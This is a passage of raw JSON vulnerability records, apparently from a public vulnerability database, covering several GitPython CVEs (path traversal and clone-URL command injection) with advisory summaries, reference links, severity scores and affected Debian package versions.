10/msg00030.html"},{"reference_url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AV5DV7GBLMOZT7U3Q4TDOJO5R6G3V6GH","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AV5DV7GBLMOZT7U3Q4TDOJO5R6G3V6GH"},{"reference_url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PF6AXUTC5BO7L2SBJMCVKJSPKWY52I5R","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PF6AXUTC5BO7L2SBJMCVKJSPKWY52I5R"},{"reference_url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AV5DV7GBLMOZT7U3Q4TDOJO5R6G3V6GH","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AV5DV7GBLMOZT7U3Q4TDOJO5R6G3V6GH"},{"reference_url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PF6AXUTC5BO7L2SBJMCVKJSPKWY52I5R","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PF6AXUTC5BO7L2SBJMCVKJSPKWY52I5R"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1043503","reference_id":"1043503","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1043503"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2231474","reference_id":"2231474","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2231474"},{"reference_url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AV5DV7GBLMOZT7U3Q4TDOJO5R6G3V6GH/","reference_id":"AV5DV7GBLMOZT7U3Q4TDOJO5R6G3V6GH","reference_type":"","scores":[{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2024-10-10T18:18:08Z/"}],"url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AV5DV7GBLMOZT7U3Q4TDOJO5R6G3V6GH/"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-40267","reference_id":"CVE-2023-40267","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-40267"},{"reference_url":"https://github.com/advisories/GHSA-pr76-5cm5-w9cj","reference_id":"GHSA-pr76-5cm5-w9cj","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-pr76-5cm5-w9cj"},{"reference_url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PF6AXUTC5BO7L2SBJMCVKJSPKWY52I5R/","reference_id":"PF6AXUTC5BO7L2SBJMCVKJSPKWY52I5R","reference_type":"","scores":[{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2024-10-10T18:18:08Z/"}],"url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PF6AXUTC5BO7L2SBJMCVKJSPKWY52I5R/"},{"reference_url":"https://access.redhat.com/errata/RHSA-2023:4971","reference_id":"RHSA-2023:4971","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2023:4971"},{"reference_url":"https://access.redhat.com/errata/RHSA-2023:4991","reference_id":"RHSA-2023:4991","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2023:4991"},{"reference_url":"https://access.redhat.com/errata/RHSA-2023:5931","reference_id":"RHSA-2023:5931","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2023:5931"},{"reference_url":"https://access.redhat.com/errata/RHSA-2023:6818","reference_id":"RHSA-2023:6818","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2023:6818"},{"reference_url":"https://usn.ubuntu.com/6326-1/","reference_id":"USN-6326-1","reference_type":"","scores":[],"url":"https://usn.ubuntu.com/6326-1/"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/936506?format=json","purl":"pkg:deb/debian/python-git@3.1.14-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9ktn-1cej-e3fb"},{"vulnerability":"VCID-mntu-memc-x7hp"},{"vulnerability":"VCID-tgne-b83n-6qb4"},{"vulnerability":"VCID-uyvb-m1pr-2kdy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-git@3.1.14-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/936507?format=json","purl":"pkg:deb/debian/python-git@3.1.14-1%2Bdeb11u1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-git@3.1.14-1%252Bdeb11u1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/936504?format=json","purl":"pkg:deb/debian/python-git@3.1.30-1%2Bdeb12u2?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9ktn-1cej-e3fb"},{"vulnerability":"VCID-mntu-memc-x7hp"},{"vulnerability":"VCID-tgne-b83n-6qb4"},{"vulnerability":"VCID-uyvb-m1pr-2kdy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-git@3.1.30-1%252Bdeb12u2%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/936510?format=json","purl":"pkg:deb/debian/python-git@3.1.36-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-git@3.1.36-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/936509?format=json","purl":"pkg:deb/debian/python-git@3.1.44-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9ktn-1cej-e3fb"},{"vulnerability":"VCID-mntu-memc-x7hp"},{"vulnerability":"VCID-tgne-b83n-6qb4"},{"vulnerability":"VCID-uyvb-m1pr-2kdy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-git@3.1.44-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/936508?format=json","purl":"pkg:deb/debian/python-git@3.1.46-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9ktn-1cej-e3fb"},{"vulnerability":"VCID-mntu-memc-x7hp"},{"vulnerability":"VCID-tgne-b83n-6qb4"},{"vulnerability":"VCID-uyvb-m1pr-2kdy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-git@3.1.46-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1103050?format=json","purl":"pkg:deb/debian/python-git@3.1.50-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-git@3.1.50-1%3Fdistro=trixie"}],"aliases":["CVE-2023-40267","GHSA-pr76-5cm5-w9cj","PYSEC-2023-137"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-16je-k2yd-jydf"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/10990?format=json","vulnerability_id":"VCID-43fr-z5nf-cqax","summary":"GitPython is a python library used to interact with Git repositories. In order to resolve some git references, GitPython reads files from the `.git` directory, in some places the name of the file being read is provided by the user, GitPython doesn't check if this file is located outside the `.git` directory. This allows an attacker to make GitPython read any file from the system. This vulnerability is present in https://github.com/gitpython-developers/GitPython/blob/1c8310d7cae144f74a671cbe17e51f63a830adbf/git/refs/symbolic.py#L174-L175. That code joins the base directory with a user given string without checking if the final path is located outside the base directory. This vulnerability cannot be used to read the contents of files but could in theory be used to trigger a denial of service for the program. This issue has not yet been addressed.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-41040.json","reference_id":"","reference_type":"","scores":[{"value":"5.1","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2023-41040.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-41040","reference_id":"","reference_type":"","scores":[{"value":"0.0036","scoring_system":"epss","scoring_elements":"0.58226","published_at":"2026-05-14T12:55:00Z"},{"value":"0.0036","scoring_system":"epss","scoring_elements":"0.58156","published_at":"2026-05-12T12:55:00Z"},{"value":"0.0036","scoring_system":"epss","scoring_elements":"0.58175","published_at":"2026-05-09T12:55:00Z"},{"value":"0.0036","scoring_system":"epss","scoring_elements":"0.58073","published_at":"2026-05-05T12:55:00Z"},{"value":"0.0036","scoring_system":"epss","scoring_elements":"0.58127","published_at":"2026-05-11T12:55:00Z"},{"value":"0.0036","scoring_system":"epss","scoring_elements":"0.58114","published_at":"2026-05-07T12:55:00Z"},{"value":"0.0036","scoring_system":"epss","scoring_elements":"0.58148","published_at":"2026-04-21T12:55:00Z"},{"value":"0.0036","scoring_system":"epss","scoring_elements":"0.58173","published_at":"2026-04-18T12:55:00Z"},{"value":"0.0036","scoring_system":"epss","scoring_elements":"0.58171","published_at":"2026-04-16T12:55:00Z"},{"value":"0.0036","scoring_system":"epss","scoring_elements":"0.58183","published_at":"2026-04-11T12:55:00Z"},{"value":"0.0036","scoring_system":"epss","scoring_elements":"0.58141","published_at":"2026-04-13T12:55:00Z"},{"value":"0.0036","scoring_system":"epss","scoring_elements":"0.5816","published_at":"2026-04-12T12:55:00Z"},{"value":"0.0036","scoring_system":"epss","scoring_elements":"0.58169","published_at":"2026-04-09T12:55:00Z"},{"value":"0.0036","scoring_system":"epss","scoring_elements":"0.58165","published_at":"2026-04-08T12:55:00Z"},{"value":"0.0036","scoring_system":"epss","scoring_elements":"0.58111","published_at":"2026-04-29T12:55:00Z"},{"value":"0.0036","scoring_system":"epss","scoring_elements":"0.58136","published_at":"2026-04-04T12:55:00Z"},{"value":"0.0036","scoring_system":"epss","scoring_elements":"0.58115","published_at":"2026-04-02T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-41040"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-41040","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-41040"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://github.com/gitpython-developers/GitPython","reference_id":"","reference_type":"","scores":[{"value":"4.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/gitpython-developers/GitPython"},{"reference_url":"https://github.com/gitpython-developers/GitPython/blob/1c8310d7cae144f74a671cbe17e51f63a830adbf/git/refs/symbolic.py#L174-L175","reference_id":"","reference_type":"","scores":[{"value":"4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"4.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-01T18:04:46Z/"}],"url":"https://github.com/gitpython-developers/GitPython/blob/1c8310d7cae144f74a671cbe17e51f63a830adbf/git/refs/symbolic.py#L174-L175"},{"reference_url":"https://github.com/gitpython-developers/GitPython/commit/74e55ee4544867e1bd976b7df5a45869ee397b0b","reference_id":"","reference_type":"","scores":[{"value":"4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"4.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-01T18:04:46Z/"}],"url":"https://github.com/gitpython-developers/GitPython/commit/74e55ee4544867e1bd976b7df5a45869ee397b0b"},{"reference_url":"https://github.com/gitpython-developers/GitPython/commit/e98f57b81f792f0f5e18d33ee658ae395f9aa3c4","reference_id":"","reference_type":"","scores":[{"value":"4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"4.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-01T18:04:46Z/"}],"url":"https://github.com/gitpython-developers/GitPython/commit/e98f57b81f792f0f5e18d33ee658ae395f9aa3c4"},{"reference_url":"https://github.com/gitpython-developers/GitPython/pull/1672","reference_id":"","reference_type":"","scores":[{"value":"4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"4.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-01T18:04:46Z/"}],"url":"https://github.com/gitpython-developers/GitPython/pull/1672"},{"reference_url":"https://github.com/gitpython-developers/GitPython/releases/tag/3.1.37","reference_id":"","reference_type":"","scores":[{"value":"4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"4.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-01T18:04:46Z/"}],"url":"https://github.com/gitpython-developers/GitPython/releases/tag/3.1.37"},{"reference_url":"https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-cwvm-v4w8-q58c","reference_id":"","reference_type":"","scores":[{"value":"4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"4.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-01T18:04:46Z/"}],"url":"https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-cwvm-v4w8-q58c"},{"reference_url":"https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2023-165.yaml","reference_id":"","reference_type":"","scores":[{"value":"4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"4.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-01T18:04:46Z/"}],"url":"https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2023-165.yaml"},{"reference_url":"https://lists.debian.org/debian-lts-announce/2023/09/msg00036.html","reference_id":"","reference_type":"","scores":[{"value":"4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"4.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-01T18:04:46Z/"}],"url":"https://lists.debian.org/debian-lts-announce/2023/09/msg00036.html"},{"reference_url":"https://lists.debian.org/debian-lts-announce/2024/10/msg00030.html","reference_id":"","reference_type":"","scores":[{"value":"4.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.debian.org/debian-lts-announce/2024/10/msg00030.html"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2247040","reference_id":"2247040","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2247040"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-41040","reference_id":"CVE-2023-41040","reference_type":"","scores":[{"value":"4.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-41040"},{"reference_url":"https://github.com/advisories/GHSA-cwvm-v4w8-q58c","reference_id":"GHSA-cwvm-v4w8-q58c","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cwvm-v4w8-q58c"},{"reference_url":"https://access.redhat.com/errata/RHSA-2023:7851","reference_id":"RHSA-2023:7851","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2023:7851"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:0190","reference_id":"RHSA-2024:0190","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:0190"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:0215","reference_id":"RHSA-2024:0215","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:0215"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:0322","reference_id":"RHSA-2024:0322","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:0322"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/936506?format=json","purl":"pkg:deb/debian/python-git@3.1.14-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9ktn-1cej-e3fb"},{"vulnerability":"VCID-mntu-memc-x7hp"},{"vulnerability":"VCID-tgne-b83n-6qb4"},{"vulnerability":"VCID-uyvb-m1pr-2kdy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-git@3.1.14-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/936507?format=json","purl":"pkg:deb/debian/python-git@3.1.14-1%2Bdeb11u1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-git@3.1.14-1%252Bdeb11u1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/936504?format=json","purl":"pkg:deb/debian/python-git@3.1.30-1%2Bdeb12u2?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9ktn-1cej-e3fb"},{"vulnerability":"VCID-mntu-memc-x7hp"},{"vulnerability":"VCID-tgne-b83n-6qb4"},{"vulnerability":"VCID-uyvb-m1pr-2kdy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-git@3.1.30-1%252Bdeb12u2%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/936510?format=json","purl":"pkg:deb/debian/python-git@3.1.36-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-git@3.1.36-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/936509?format=json","purl":"pkg:deb/debian/python-git@3.1.44-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9ktn-1cej-e3fb"},{"vulnerability":"VCID-mntu-memc-x7hp"},{"vulnerability":"VCID-tgne-b83n-6qb4"},{"vulnerability":"VCID-uyvb-m1pr-2kdy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-git@3.1.44-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/936508?format=json","purl":"pkg:deb/debian/python-git@3.1.46-1?distro=trixie","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9ktn-1cej-e3fb"},{"vulnerability":"VCID-mntu-memc-x7hp"},{"vulnerability":"VCID-tgne-b83n-6qb4"},{"vulnerability":"VCID-uyvb-m1pr-2kdy"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-git@3.1.46-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1103050?format=json","purl":"pkg:deb/debian/python-git@3.1.50-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/python-git@3.1.50-1%3Fdistro=trixie"}],"aliases":["CVE-2023-41040","GHSA-cwvm-v4w8-q58c","PYSEC-2023-165"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-43fr-z5nf-cqax"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/9835?format=json","vulnerability_id":"VCID-dtjt-b2am-9fab","summary":"All versions of package gitpython are vulnerable to Remote Code Execution (RCE) due to improper user input validation, which makes it possible to inject a maliciously crafted remote URL into the clone command. Exploiting this vulnerability is possible because the library makes external calls to git without sufficient sanitization of input arguments.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-24439.json","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-24439.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-24439","reference_id":"","reference_type":"","scores":[{"value":"0.68859","scoring_system":"epss","scoring_elements":"0.98648","published_at":"2026-05-14T12:55:00Z"},{"value":"0.68859","scoring_system":"epss","scoring_elements":"0.98646","published_at":"2026-05-12T12:55:00Z"},{"value":"0.68859","scoring_system":"epss","scoring_elements":"0.98644","published_at":"2026-05-11T12:55:00Z"},{"value":"0.68859","scoring_system":"epss","scoring_elements":"0.98643","published_at":"2026-05-07T12:55:00Z"},{"value":"0.68859","scoring_system":"epss","scoring_elements":"0.98642","published_at":"2026-05-05T12:55:00Z"},{"value":"0.68859","scoring_system":"epss","scoring_elements":"0.98638","published_at":"2026-04-29T12:55:00Z"},{"value":"0.68859","scoring_system":"epss","scoring_elements":"0.98634","published_at":"2026-04-21T12:55:00Z"},{"value":"0.68859","scoring_system":"epss","scoring_elements":"0.98633","published_at":"2026-04-16T12:55:00Z"},{"value":"0.68859","scoring_system":"epss","scoring_elements":"0.98617","published_at":"2026-04-02T12:55:00Z"},{"value":"0.68859","scoring_system":"epss","scoring_elements":"0.9863","published_at":"2026-04-13T12:55:00Z"},{"value":"0.68859","scoring_system":"epss","scoring_elements":"0.98629","published_at":"2026-04-12T12:55:00Z"},{"value":"0.68859","scoring_system":"epss","scoring_elements":"0.9862","published_at":"2026-04-04T12:55:00Z"},{"value":"0.68859","scoring_system":"epss","scoring_elements":"0.98622","published_at":"2026-04-07T12:55:00Z"},{"value":"0.68859","scoring_system":"